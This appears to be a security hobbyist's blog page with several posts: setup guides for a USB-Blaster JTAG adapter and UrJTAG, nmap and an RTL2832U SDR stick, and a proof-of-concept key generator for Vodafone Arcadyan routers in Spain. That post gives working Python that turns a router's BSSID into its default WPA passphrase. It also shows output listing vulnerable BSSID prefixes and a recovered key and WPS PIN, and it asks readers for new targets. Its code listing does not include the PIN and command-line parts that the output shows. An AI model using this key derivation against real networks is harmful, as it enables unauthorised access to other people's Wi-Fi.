Installing UrJTAG and Altera USB blaster JTAG on Linux Ubuntu 12.04

Thursday, 5 June 2014 (no comments)

Hey everyone, I have not been writing for a while because of my limited spare time. Today I am going to talk about how to set up your box to debug embedded systems using JTAG. I will not describe it in detail because I am writing a paper on exactly that topic, and that paper will explain all of this in sufficient depth. However, you can get your really cheap JTAG working on any Linux system by following the steps below. The great feature of these JTAG adapters is that they support the MIPS architecture, so we can extract the firmware of many routers, modems and other embedded devices.

JTAG is an acronym for Joint Test Action Group. It is a serial wire protocol dedicated to testing and recovering embedded hardware. It is a specialization of the synchronous four-wire Serial Peripheral Interface (SPI). JTAG has a (slow) line clock (TCK), separate data in (TDI) and data out (TDO) lines, and a "test mode select" (TMS) line for controlling the state of the JTAG engine. TDI and TMS are clocked in on the rising edge of TCK, and TDO is clocked out on its falling edge. Sometimes there is also a test reset line (TRST). [1]
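As an added illustration (my own example code, not from the original post or from UrJTAG), here is a software model of the TAP controller that TMS steers, plus a minimal IEEE 1149.1 device: it shows why five TCK cycles with TMS held high reach Test-Logic-Reset from any state, and how a DR scan after reset clocks the 32-bit IDCODE out of TDO least-significant bit first, which is what UrJTAG's reset and idcode commands rely on. The IDCODE value 0x1BADC0DD is a constructed sample.

```python
# Added example, not code from the post or from UrJTAG: a model of the JTAG TAP
# controller (IEEE 1149.1) and of one device on the chain.

# TAP_NEXT[state] = (next state if TMS=0, next state if TMS=1); the transition
# happens on the rising edge of TCK, when TMS and TDI are sampled.
TAP_NEXT = {
    "Test-Logic-Reset": ("Run-Test/Idle", "Test-Logic-Reset"),
    "Run-Test/Idle":    ("Run-Test/Idle", "Select-DR-Scan"),
    "Select-DR-Scan":   ("Capture-DR",    "Select-IR-Scan"),
    "Capture-DR":       ("Shift-DR",      "Exit1-DR"),
    "Shift-DR":         ("Shift-DR",      "Exit1-DR"),
    "Exit1-DR":         ("Pause-DR",      "Update-DR"),
    "Pause-DR":         ("Pause-DR",      "Exit2-DR"),
    "Exit2-DR":         ("Shift-DR",      "Update-DR"),
    "Update-DR":        ("Run-Test/Idle", "Select-DR-Scan"),
    "Select-IR-Scan":   ("Capture-IR",    "Test-Logic-Reset"),
    "Capture-IR":       ("Shift-IR",      "Exit1-IR"),
    "Shift-IR":         ("Shift-IR",      "Exit1-IR"),
    "Exit1-IR":         ("Pause-IR",      "Update-IR"),
    "Pause-IR":         ("Pause-IR",      "Exit2-IR"),
    "Exit2-IR":         ("Shift-IR",      "Update-IR"),
    "Update-IR":        ("Run-Test/Idle", "Select-DR-Scan"),
}


class TapController:
    """The 16-state machine steered purely by TMS."""

    def __init__(self, state="Test-Logic-Reset"):
        self.state = state

    def clock(self, tms):
        """One rising edge of TCK with TMS sampled as 0 or 1; returns the new state."""
        self.state = TAP_NEXT[self.state][1 if tms else 0]
        return self.state

    def walk(self, tms_bits):
        """Apply a TMS sequence and return the states visited, in order."""
        return [self.clock(b) for b in tms_bits]


class JtagDevice(TapController):
    """Minimal device: Test-Logic-Reset selects the IDCODE register, so a plain
    DR scan afterwards clocks out the 32-bit IDCODE, bit 0 first."""

    IDCODE_BITS = 32

    def __init__(self, idcode):
        TapController.__init__(self)
        self.idcode = idcode  # sample value supplied by the caller (constructed)
        self.shift_reg = 0
        self.shift_len = 0

    def step(self, tms, tdi=0):
        """One TCK cycle. Returns the TDO bit the host sampled before this edge
        (driven on the previous falling edge); TDI enters at the register MSB."""
        tdo = None
        if self.state == "Shift-DR" and self.shift_len:
            tdo = self.shift_reg & 1
            self.shift_reg = (self.shift_reg >> 1) | ((tdi & 1) << (self.shift_len - 1))
        self.clock(tms)
        if self.state == "Capture-DR":      # parallel load of the selected DR
            self.shift_reg, self.shift_len = self.idcode, self.IDCODE_BITS
        return tdo

    def scan_dr(self, tdi_bits):
        """Host-side DR scan that starts and ends in Run-Test/Idle: shift the given
        bits in and return the bits clocked out, LSB first."""
        assert self.state == "Run-Test/Idle"
        self.step(1)                               # Select-DR-Scan
        self.step(0)                               # Capture-DR
        self.step(0)                               # Shift-DR
        out = []
        for i, bit in enumerate(tdi_bits):
            last = i == len(tdi_bits) - 1          # last bit leaves Shift-DR with TMS=1
            out.append(self.step(1 if last else 0, bit))
        self.step(1)                               # Exit1-DR -> Update-DR
        self.step(0)                               # Update-DR -> Run-Test/Idle
        return out


def bits_to_int(bits):
    """Assemble a value from bits given LSB first."""
    return sum(b << i for i, b in enumerate(bits))


def decode_idcode(code):
    """Split a 32-bit IDCODE into its IEEE 1149.1 fields; bit 0 must read 1."""
    return {"version": (code >> 28) & 0xF, "part": (code >> 12) & 0xFFFF,
            "manufacturer": (code >> 1) & 0x7FF, "valid": bool(code & 1)}


def read_idcode(dev):
    """What 'reset' then 'idcode' do: five TMS=1 clocks reach Test-Logic-Reset from
    any state, one TMS=0 clock reaches Run-Test/Idle, then a 32-bit DR scan."""
    dev.walk([1, 1, 1, 1, 1])
    dev.clock(0)
    return bits_to_int(dev.scan_dr([0] * 32))


if __name__ == "__main__":
    code = read_idcode(JtagDevice(0x1BADC0DD))   # constructed sample IDCODE
    print("IDCODE 0x%08X -> %s" % (code, decode_idcode(code)))
```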

JTAGing a device requires a JTAG cable, though these days the "cable" is usually a programmer with its own on-board logic. Chinese clones of the popular Altera USB-Blaster JTAG programmer are inexpensive, costing under 7 euros. [1]

How to install your Altera USB-Blaster JTAG on Linux

First of all, we check which vendor and product ID our Altera blaster has:

$ lsusb 
Bus 001 Device 014: ID 09fb:6001 Altera 

After that, we must add a new udev rule so that our device can be accessed from userland: [2] [3]

$ sudo vim /etc/udev/rules.d/altera-usb-blaster.rules
	ATTR{idVendor}=="09fb", ATTR{idProduct}=="6001", MODE="666"

Then we reload the rules and check how this change affected our system: just unplug the USB-JTAG and plug it in again.

$ sudo udevadm control --reload-rules
$ dmesg | tail
[472572.885351] usb 2-1.3: New USB device found, idVendor=09fb, idProduct=6001
[472572.885356] usb 2-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[472572.885360] usb 2-1.3: Product: USB-Blaster
[472572.885362] usb 2-1.3: Manufacturer: EPFL
[472572.885365] usb 2-1.3: SerialNumber: 00000000

Our USB-JTAG Altera blaster should now be ready to play with.

How to install the Universal JTAG on Linux

Once our device is recognized by our box, we still need software to drive it. Many JTAG adapters are based on the FT2232 chip from Future Technology Devices International (FTDI). Our Altera USB-Blaster also shows up as an FTDI device, but USB-Blaster devices are not protocol-compatible with FT2232 devices; they are, however, protocol-compatible among themselves. USB-JTAG devices typically consist of an FT245 followed by a CPLD that understands a particular protocol, or they emulate this protocol using some other hardware. [7] Before installing UrJTAG (the Universal JTAG library), some dependencies must be resolved:

$ sudo apt-get install libftdi-dev libusb-1.0-0 -y

We have three possible options to install UrJTAG.

Option 1 (Subversion trunk, #2041)

I highly recommend this option because you will get the latest updates to the framework so far. Actually, I have not played with it enough yet to verify whether the stable release or the unstable trunk is better.

$ svn checkout svn://svn.code.sf.net/p/urjtag/svn/trunk urjtag-svn
$ cd urjtag-svn/urjtag
$ sudo apt-get install autopoint gettext libtool -y
$ ./autogen.sh
$ # ./configure is already run by autogen.sh; run it again here with special options if needed
$ make
$ sudo make install

$ cd urjtag-svn/urjtag/src/apps/jtag
$ ./jtag
UrJTAG 0.10   2041
Copyright (C) 2002, 2003 ETC s.r.o.
Copyright (C) 2007, 2008, 2009 Kolja Waschk and the respective authors

UrJTAG is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
There is absolutely no warranty for UrJTAG.

warning: UrJTAG may damage your hardware!
Type "quit" to exit, "help" for help.

jtag>

Option 2 (from SourceForge, release 0.10 #1502)

If you definitely prefer stability, because your hardware is already properly supported, then you can pick this option.

$ wget http://downloads.sourceforge.net/project/urjtag/urjtag/0.10/urjtag-0.10.tar.gz
$ tar zxvf urjtag-0.10.tar.gz
$ cd urjtag-0.10
$ ./configure

jtag is now configured for

  Detected libusb      : yes
  Detected libftdi     : yes
  Detected libftd2xx   : no
  Detected inpout32    : no
  Build SVF player     : yes
  Build BSDL subsystem : yes
  Bus drivers          : au1500 avr32 bcm1250 bf526_ezkit bf527_ezkit bf533_stamp bf533_ezkit bf537_stamp bf537_ezkit bf538f_ezkit bf548_ezkit bf561_ezkit bscoach ejtag ejtag_dma fjmem ixp425 jopcyc h7202 lh7a400 mpc5200 mpc824x ppc405ep ppc440gx_ebc8 prototype pxa2x0 pxa27x s3c4510 sa1110 sh7727 sh7750r sh7751r sharc_21065L slsup3 tx4925 zefant_xs3 
  Cable drivers        : arcom byteblaster dlc5 ea253 ei012 ft2232 igloo jlink keithkoep lattice mpcbdm triton usbblaster wiggler xpc 
  Lowlevel drivers     : direct ftdi ppdev 

$ make && sudo make install

$ cd ../src/

$ ./jtag 

UrJTAG 0.10 1502
Copyright (C) 2002, 2003 ETC s.r.o.
Copyright (C) 2007, 2008, 2009 Kolja Waschk and the respective authors

UrJTAG is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
There is absolutely no warranty for UrJTAG.

WARNING: UrJTAG may damage your hardware!
Type "quit" to exit, "help" for help.

jtag> cable Usbblaster
Connected to libftdi driver.
jtag> help
Command list:

quit          exit and terminate this session
help          display this help
frequency     setup JTAG frequency
cable         select JTAG cable
reset         reset JTAG chain
discovery     discovery of unknown parts in the JTAG chain
idcode        Read IDCODEs of all parts in a JTAG chain
detect        detect parts on the JTAG chain
signal        define new signal for a part
scan          read BSR and show changes since last scan
salias        define an alias for a signal
bit           define new BSR bit
register      define new data register for a part
initbus       initialize bus driver for active part
print         display JTAG chain list/status
part          change active part for current JTAG chain
bus           change active bus
instruction   change active instruction for a part or declare new instruction
shift         shift data/instruction registers through JTAG chain
dr            display active data register for a part
get           get external signal value
test          test external signal value
shell         shell cmmd
set           set external signal value
endian        set/print endianess
peek          read a single word
poke          write a single word
pod           Set state of POD signal(s)
readmem       read content of the memory and write it to file
writemem      write content of file to the memory
detectflash   detect parameters of flash chips attached to a part
flashmem      burn flash memory with data from a file
eraseflash    erase flash memory by number of blocks
script        run command sequence from external file
include       include command sequence from external repository
addpart       manually adds parts on the JTAG chain
usleep        Sleep some number of microseconds
svf           execute svf commands from file
bsdl          manage BSDL files
debug         debug jtag program

Type "help COMMAND" for details about a particular command.
jtag>

Option 3 (from the Ubuntu repositories)

If you are lazy or just want to try something quickly without compiling, you can take this option.

$ apt-cache search jtag
avarice - use GDB with Atmel's JTAG ICE for the AVR
flashrom - Identify, read, write, erase, and verify BIOS/ROM/flash chips
flexloader - utility to configure SRAM based ALTERA devices
libusbprog-dev - Development files for libusbprog
libusbprog0 - Library for programming the USBprog hardware
mspdebug - debugging tool for MSP430 microcontrollers
openocd - Open on-chip JTAG debug solution for ARM and MIPS systems
openwince-jtag - allows programming jtag capable devices such as CPUs or FPGAs
urjtag - JTAG programmer for various flash parts and boards
usbprog - Firmware programming tool for the USBprog hardware
usbprog-gui - GUI firmware programming tool for the USBprog hardware

$ sudo apt-get install -y urjtag

References

[1] http://huaweihg612hacking.wordpress.com/2012/11/07/jtaging-the-broadcom-bcm6368-hg612/
[2] http://www.altera.com/download/drivers/dri-usb_b-lnx.html
[3] http://www.eecg.toronto.edu/~laforest/USB-Blaster-Debian.html
[4] http://openocd.sourceforge.net/doc/pdf/openocd.pdf
[5] http://sourceforge.net/p/urjtag/svn/HEAD/tree/trunk/
[6] https://forum.openwrt.org/viewtopic.php?id=4191
[7] http://openocd.sourceforge.net/doc/html/Debug-Adapter-Hardware.html#Debug-Adapter-Hardware


Arcadyan routers used by Vodafone in Spain are also vulnerable

Tuesday, 4 February 2014 (1 comment)

Background

Around 2011, some routers manufactured by the company Arcadyan were reverse engineered by the staff of seguridadwireless.net. That research originated with a user called MrFoffly, or something like that. He obtained an interesting log from a Ya.com update: he took a firmware image, applied XOR FF to it in raw mode and obtained the following log strings. Many routers could be affected by the same vulnerability in the future if this company keeps using the same public, patented algorithms.

##!![E-BOOTPARAM-WRITE] User settings are not stored!!
###[BUILD-WEP] (Z1 Z2 Z3): %1X%1X%1X
##[BUILD-WEP] (x[1] XOR z[2])=(%1X XOR %1X)=%1X
##[BUILD-WEP] (y[2] XOR y[3]) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (x[3]  XOR y[1]) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (x[2]  XOR z[3]) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (w[0] w[1] w[2] w[3]): %1X%1X%1X%1X
####%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X#[BUILD-WEP]: Key:%s
####[BUILD-WEP] K1,2:[%1X,%1X]
#[BUILD-WEP] (K1 XOR S10)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K1 XOR S9) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (K1 XOR S8) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (X1 X2 X3): %1X%1X%1X
##[BUILD-WEP] (K2 XOR M10)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K2 XOR M11)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K2 XOR M12)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (Y1 Y2 Y3): %1X%1X%1X
##[BUILD-WEP] (M11 XOR S10)=(%1X XOR %1X)=%1X
####Boot Parameters NOT found !!!
##Bootcode version: %s
###Serial number: %s
##Hardware version: %s
###%02X%02X%02X%02X%02X%02X####strWlanMacAddr:%s
##WLAN%c%c%c%c%c%c####[BUILD-WEP] S6,7,8,9,10:[%1X,%1X,%1X,%1X,%1X]
##[BUILD-WEP] M7,8,9,10,11,12:[%1X,%1X,%1X,%1X,%1X,%1X]
##!!! Invalid wireless channel range %d ~ %d
#!!! Use default value %d ~ %d
##default route: %d.%d.%d.%d
#ifno:%d  enableOS:%d enableWEP:%d enableSSN:%d
#!!No configuration file present!!
##!!Cleanup configuration in flash memory!!
##%s> flash version:[%s], [%d.%d.%d]
#etcpip_init_config##Jan 18 2008#16:39:45####Set flash memory layout to #BRN-BOOT####Boot Parameters found !!!
##01234567####[BUILD-WEP] (M12 XOR S9) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (K1  XOR K2) =(%1X XOR %1X)=%1X
####!![E-CFG-VER] Reconfiguration required!!

 

After that, some of us were a bit stuck, but another user, Mambostar, managed to figure out the algorithm and generate 10 possible keys using the logs as well as the patents (see the references). Two years later, some German researchers reverse engineered some EasyBox routers and found the same problems. Using either this algorithm or the patents, many routers all over Germany were exposed. Roughly one year later, in 2013-2014, this algorithm has unfortunately come back to hit some Spanish routers deployed by Vodafone, specifically the ARV752DPW model. However, not many of Vodafone's routers have really been affected by this vulnerability.

Proof-of-concept

Here is a proof-of-concept for this vulnerability, which I coded because of a small difference in the algorithm. Plenty of code has been reused from previous scripts; please take a look at the credits in the code. So far the only difference observed is that zeros are swapped for ones at the end of the key generation algorithm, plus other very weird things like the use of non-hexadecimal characters in the ESSID: if a zero appears in the fifth or sixth byte of the BSSID, it is automatically transformed into a G in the ESSID.

import sys

def algorithm(mac):
    '''Sebastian Petters. Changes: Added exceptions and leave out some variables pointless'''
    try:
        # The six BSSID bytes; the last two form a 16-bit value printed as five decimal digits
        octets = [int(x, 16) for x in mac.split(':')]
        c1 = (octets[-2] << 8) + octets[-1]
        (s6, s7, s8, s9, s10) = [int(x) for x in '%05d' % (c1)]
        # The last four hex nibbles of the BSSID
        (m9, m10, m11, m12)   = [int(x, 16) for x in mac.replace(':', '')[8:]]
    except (ValueError, IndexError):
        sys.stderr.write("[!] Check your bssid!  Format XX:XX:XX:XX:XX:XX\n")
        sys.exit(1)

    k1 = ( s7 + s8  + m11 + m12) & (0x0F)
    k2 = ( m9 + m10 + s9  + s10) & (0x0F)
    x1 = k1  ^ s10
    x2 = k1  ^ s9
    x3 = k1  ^ s8
    y1 = k2  ^ m10
    y2 = k2  ^ m11
    y3 = k2  ^ m12
    z1 = m11 ^ s10
    z2 = m12 ^ s9
    z3 = k1  ^ k2

    # Nine hex nibbles, interleaved as x, y, z for each of the three groups
    wpa = "%X%X%X%X%X%X%X%X%X" % (x1, y1, z1, x2, y2, z2, x3, y3, z3)

    # Spanish modification in this algorithm: every zero becomes a one
    wpa = wpa.replace("0", "1")

    return wpa

Any suggestions or feedback are always very much appreciated, as are reports of bugs in the code or any enhancements.

$ python vodafoneArcadyanSpain.py -h
usage: vodafoneArcadyanSpain.py [-h] [-b [BSSID]] [-v] [-l]

>>> PoC keygen for WiFi Networks deployed by Vodafone Arcadyan in Spain. So
far only WiFi networks with well-known bssids and essid like VodafoneXXXX are
likely vulnerable. See http://ednolo.alumnos.upv.es/ for more details.
Twitter: @enovella_ and email: ednolo[at]inf.upv.es

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -l, --list            List all vulnerable mac address (essid VodafoneXXXX)

required:
  -b [BSSID], --bssid [BSSID]
                        Target mac address

(+) Help: Send me bugs or new targets. Credits buckynet as usual 

$ python vodafoneArcadyanSpain.py -l
[+] Possible vulnerable targets:
	 bssid: 74:31:70:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 84:9C:A6:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 88:03:55:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 1C:C6:3C:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 50:7E:5D:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 00:12:BF:xx:xx:xx 	 essid: VodafoneXXXX

$ python vodafoneArcadyanSpain.py -b 74:31:70:33:00:11
[+] SSID       : VodafoneGG11
[+] BSSID      : 74:31:70:33:00:11
[+] WPA KEY    : 58639129A
[+] WPS PIN    : 75944988

 

[+] UPDATE Android 2014-02-15

The new version of wlan4xx includes this algorithm. You can find it for Android devices at http://wlan4xx.blogspot.com/

 

[+] References:

http://foro.seguridadwireless.net/desarrollo-112/wlan4xx-algoritmo-routers-yacom/ (SPAIN)
http://www.wotan.cc/?p=6
http://www.wardriving-forum.de/wiki/Standardpassw%C3%B6rter
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130805-0_Vodafone_EasyBox_Default_WPS_PIN_Vulnerability_v10.txt
http://wiki.openwrt.org/toh/arcadyan/arv752dpw
http://www.securitybydefault.com/2014/01/ahora-tambien-puedes-robarle-la-wifi-de.html

[+] Patents:

http://www.patent-de.com/20081120/DE102007047320A1.html
http://www.patentstorm.us/applications/20080285498/description.html

 


Compiling nmap 6.40 on Ubuntu 12.04.3

Saturday, 14 December 2013 (no comments)

If you are using nmap from the Ubuntu repositories, you are surely using an old version that lacks many features, such as newer scripts. Therefore, if you want to compile it from source, just follow these steps:

wget http://nmap.org/dist/nmap-6.40.tar.bz2
tar -jxvf nmap-6.40.tar.bz2
cd nmap-6.40
./configure
make "LUA_LIBS=../liblua/liblua.a -ldl -lm"
sudo checkinstall
sudo dpkg -i nmap_6.40-1_amd64.deb

And now you can enjoy nmap:

            .       .
            \`-"'"-'/
             } 6 6 {
            ==. Y ,==
              /^^^\  .
             /     \  )  Ncat: A modern interpretation of classic Netcat
            (  )-(  )/
            -""---""---   /
           /   Ncat    \_/
          (     ____
           \_.=|____E
Configuration complete.
   (  )   /\   _                 (
    \ |  (  \ ( \.(               )                      _____
  \  \ \  `  `   ) \             (  ___                 / _   \
 (_`    \+   . x  ( .\            \/   \____-----------/ (o)   \_
- .-               \+  ;          (  O                           \____
(__                +- .( -'.- <.   \_____________  `              \  /
(_____            ._._: <_ - <- _- _  VVVVVVV VV V\                \/
  .    /./.+-  . .- /  +--  - .    (--_AAAAAAA__A_/                |
  (__ ' /x  / x _/ (                \______________//_              \_______
 , x / ( '  . / .  /                                  \___'          \     /
    /  /  _/ /    +                                       |           \   /
   '  (__/                                               /              \/
                                                       /                  \
             NMAP IS A POWERFUL TOOL -- USE CAREFULLY AND RESPONSIBLY
Configuration complete.  Type make (or gmake on some *BSD machines) to compile.

$ nmap
Nmap 6.40 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
  Can pass hostnames, IP addresses, networks, etc.
  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
  -iL <inputfilename>: Input from list of hosts/networks
  -iR <num hosts>: Choose random targets
  --exclude <host1[,host2][,host3],...>: Exclude hosts/networks
  --excludefile <exclude_file>: Exclude list from file
HOST DISCOVERY:
  -sL: List Scan - simply list targets to scan
  -sn: Ping Scan - disable port scan
  -Pn: Treat all hosts as online -- skip host discovery
  -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
  -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
  -PO[protocol list]: IP Protocol Ping
  -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
  --dns-servers <serv1[,serv2],...>: Specify custom DNS servers
  --system-dns: Use OS's DNS resolver
  --traceroute: Trace hop path to each host
SCAN TECHNIQUES:
  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  -sU: UDP Scan
  -sN/sF/sX: TCP Null, FIN, and Xmas scans
  --scanflags <flags>: Customize TCP scan flags
  -sI <zombie host[:probeport]>: Idle scan
  -sY/sZ: SCTP INIT/COOKIE-ECHO scans
  -sO: IP protocol scan
  -b <FTP relay host>: FTP bounce scan
PORT SPECIFICATION AND SCAN ORDER:
  -p <port ranges>: Only scan specified ports
    Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
  -F: Fast mode - Scan fewer ports than the default scan
  -r: Scan ports consecutively - don't randomize
  --top-ports <number>: Scan <number> most common ports
  --port-ratio <ratio>: Scan ports more common than <ratio>
SERVICE/VERSION DETECTION:
  -sV: Probe open ports to determine service/version info
  --version-intensity <level>: Set from 0 (light) to 9 (try all probes)
  --version-light: Limit to most likely probes (intensity 2)
  --version-all: Try every single probe (intensity 9)
  --version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
  -sC: equivalent to --script=default
  --script=<Lua scripts>: <Lua scripts> is a comma separated list of 
           directories, script-files or script-categories
  --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts
  --script-args-file=filename: provide NSE script args in a file
  --script-trace: Show all data sent and received
  --script-updatedb: Update the script database.
  --script-help=<Lua scripts>: Show help about scripts.
           <Lua scripts> is a comma separted list of script-files or
           script-categories.
OS DETECTION:
  -O: Enable OS detection
  --osscan-limit: Limit OS detection to promising targets
  --osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
  Options which take <time> are in seconds, or append 'ms' (milliseconds),
  's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
  -T<0-5>: Set timing template (higher is faster)
  --min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes
  --min-parallelism/max-parallelism <numprobes>: Probe parallelization
  --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies
      probe round trip time.
  --max-retries <tries>: Caps number of port scan probe retransmissions.
  --host-timeout <time>: Give up on target after this long
  --scan-delay/--max-scan-delay <time>: Adjust delay between probes
  --min-rate <number>: Send packets no slower than <number> per second
  --max-rate <number>: Send packets no faster than <number> per second
FIREWALL/IDS EVASION AND SPOOFING:
  -f; --mtu <val>: fragment packets (optionally w/given MTU)
  -D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys
  -S <IP_Address>: Spoof source address
  -e <iface>: Use specified interface
  -g/--source-port <portnum>: Use given port number
  --data-length <num>: Append random data to sent packets
  --ip-options <options>: Send packets with specified ip options
  --ttl <val>: Set IP time-to-live field
  --spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address
  --badsum: Send packets with a bogus TCP/UDP/SCTP checksum
OUTPUT:
  -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3,
     and Grepable format, respectively, to the given filename.
  -oA <basename>: Output in the three major formats at once
  -v: Increase verbosity level (use -vv or more for greater effect)
  -d: Increase debugging level (use -dd or more for greater effect)
  --reason: Display the reason a port is in a particular state
  --open: Only show open (or possibly open) ports
  --packet-trace: Show all packets sent and received
  --iflist: Print host interfaces and routes (for debugging)
  --log-errors: Log errors/warnings to the normal-format output file
  --append-output: Append to rather than clobber specified output files
  --resume <filename>: Resume an aborted scan
  --stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML
  --webxml: Reference stylesheet from Nmap.Org for more portable XML
  --no-stylesheet: Prevent associating of XSL stylesheet w/XML output
MISC:
  -6: Enable IPv6 scanning
  -A: Enable OS detection, version detection, script scanning, and traceroute
  --datadir <dirname>: Specify custom Nmap data file location
  --send-eth/--send-ip: Send using raw ethernet frames or IP packets
  --privileged: Assume that the user is fully privileged
  --unprivileged: Assume the user lacks raw socket privileges
  -V: Print version number
  -h: Print this help summary page.
EXAMPLES:
  nmap -v -A scanme.nmap.org
  nmap -v -sn 192.168.0.0/16 10.0.0.0/8
  nmap -v -iR 10000 -Pn -p 80
SEE THE MAN PAGE (http://nmap.org/book/man.html) FOR MORE OPTIONS AND EXAMPLES

RTL2832U in Ubuntu 12.04.3 with kernel 3.8.0

Saturday, 7 December 2013 (2 comments)

It has been a long time since I could write in my humble blog, and this time it will also be quick: just a reminder of how to install the RTL2832U drivers on Linux. I was interested in playing with SDR and Osmocom, so I ordered the cheapest Chinese DVB USB stick, for around $8, to play with. If we take a look at the Osmocom website, we can see that this device is able to work properly.

How to install our RTL2832U on Ubuntu 12.04.3 LTS with kernel 3.8.0:

First of all, let's connect our DVB USB stick to our box and check the manufacturer with:

$ lsusb
Bus 003 Device 009: ID 0bda:2838 Realtek Semiconductor Corp.

Well, let's see if our OS was able to load the modules. Apparently not :(

$ dmesg
[25415.111665] usb 3-2: new high-speed USB device number 4 using xhci_hcd
[25415.142742] usb 3-2: New USB device found, idVendor=0bda, idProduct=2838
[25415.142748] usb 3-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[25415.142751] usb 3-2: Product: RTL2838UHIDIR
[25415.142754] usb 3-2: Manufacturer: Realtek
[25415.142757] usb 3-2: SerialNumber: 00000001
[25415.234923] usbcore: registered new interface driver dvb_usb_rtl28xxu
[25415.235054] usb 3-2: dvb_usb_v2: found a 'Realtek RTL2832U reference design' in warm state
[25415.303306] usb 3-2: dvb_usb_v2: will pass the complete MPEG2 transport stream to the software demuxer
[25415.303322] DVB: registering new adapter (Realtek RTL2832U reference design)
[25415.303637] usb 3-2: dvb_usb_rtl28xxu: unknown tuner=NONE
[25415.316812] usb 3-2: dvb_usb_v2: 'Realtek RTL2832U reference design' error while loading driver (-19)
[25415.317674] usb 3-2: dvb_usb_v2: 'Realtek RTL2832U reference design' successfully deinitialized and disconnected

 

 

For reference, it's a Chinese one with no brand, with an RTL2832 and an E4000 tuner. Here are the right steps to watch TV on your box (see the references for the 3.8.0 patch):

sudo apt-get install linux-headers-`uname -r`
sudo apt-get install libproc-processtable-perl
mkdir dvb-2832u
cd dvb-2832u
git clone git://linuxtv.org/media_build.git
cd media_build
./build
cd linux/
# dvb-usb-rtl2832.patch is the 3.8.0 patch from the forum thread in the references,
# placed in media_build/ beforehand
patch -p1 < ../dvb-usb-rtl2832.patch
cd ..
make allmodconfig
make
sudo make install

And now we can enjoy our DvB receiver:

$ dmesg
[  150.901226] usb 3-2: dvb_usb_v2: 'Realtek RTL2832U reference design' successfully deinitialized and disconnected
[  154.491864] usb 3-2: new high-speed USB device number 4 using xhci_hcd
[  154.522748] usb 3-2: New USB device found, idVendor=0bda, idProduct=2838
[  154.522753] usb 3-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[  154.522756] usb 3-2: Product: RTL2838UHIDIR
[  154.522759] usb 3-2: Manufacturer: Realtek
[  154.522761] usb 3-2: SerialNumber: 00000001
[  154.528776] usb 3-2: dvb_usb_v2: found a 'Realtek RTL2832U reference design' in warm state
[  154.598304] usb 3-2: dvb_usb_v2: will pass the complete MPEG2 transport stream to the software demuxer
[  154.598319] DVB: registering new adapter (Realtek RTL2832U reference design)
[  154.601430] usb 3-2: DVB: registering adapter 0 frontend 0 (Realtek RTL2832 (DVB-T))...
[  154.601493] r820t 0-001a: creating new instance
[  154.614036] r820t 0-001a: Rafael Micro r820t successfully identified
[  154.621529] Registered IR keymap rc-empty
[  154.621628] input: Realtek RTL2832U reference design as /devices/pci0000:00/0000:00:1c.1/0000:03:00.0/usb3/3-2/rc/rc1/input19
[  154.621712] rc1: Realtek RTL2832U reference design as /devices/pci0000:00/0000:00:1c.1/0000:03:00.0/usb3/3-2/rc/rc1
[  154.621865] input: MCE IR Keyboard/Mouse (dvb_usb_rtl28xxu) as /devices/virtual/input/input20
[  154.621935] rc rc1: lirc_dev: driver ir-lirc-codec (dvb_usb_rtl28xxu) registered at minor = 0
[  154.621937] usb 3-2: dvb_usb_v2: schedule remote query interval to 400 msecs
[  154.635023] usb 3-2: dvb_usb_v2: 'Realtek RTL2832U reference design' successfully initialized and connected

 

 

References:

http://www.linuxtv.org/wiki/index.php/RealTek_RTL2832U#Drivers
http://blog.xanthias.de/2013/06/04/cinergy-tstick-rc-dvb-rev-3-00d3-realtek-2832-unter-ubuntu/
Patch: http://forum.stmlabs.com/showthread.php?pid=46468


CrackWPA I : Breaking Belkin WPA passphrases by bruteforce (oclHashcat)

Monday, 29 July 2013 (no comments)

UPDATED! Since the release of the new algorithm, this method is pointless. Take a look at my PoC: https://bitbucket.org/dudux/belkin4xx.

